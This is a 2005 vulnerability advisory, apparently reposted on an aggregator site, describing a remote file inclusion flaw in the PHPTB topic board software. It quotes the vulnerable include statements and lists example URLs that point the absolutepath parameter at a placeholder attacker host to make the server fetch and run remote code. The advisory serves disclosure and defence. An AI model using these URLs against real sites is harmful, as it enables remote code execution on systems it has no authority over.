Ads PHPTB Code Injection Vulnerabilities Friday, 19 August 2005 Summary PHPTB is "an open source portal / topic board system". An input validation flaw in PHPTB code allows malicious attackers to cause the server to execute arbitrary code. Credit: The information has been provided by Filip Groszy ski. Details The vulnerable code exists in the following files: admin_o.php, board_o.php, dev_o.php, file_o.php and tech_o.php: include $absolutepath.classes/smart_o.php; ... EOF In dev_o.php and tech_o.php: ... require $GLOBALS[absolutepath].userpass.php; ... EOF Examples: The following URLs can be used to tirgger the vulnerability: http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/ http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.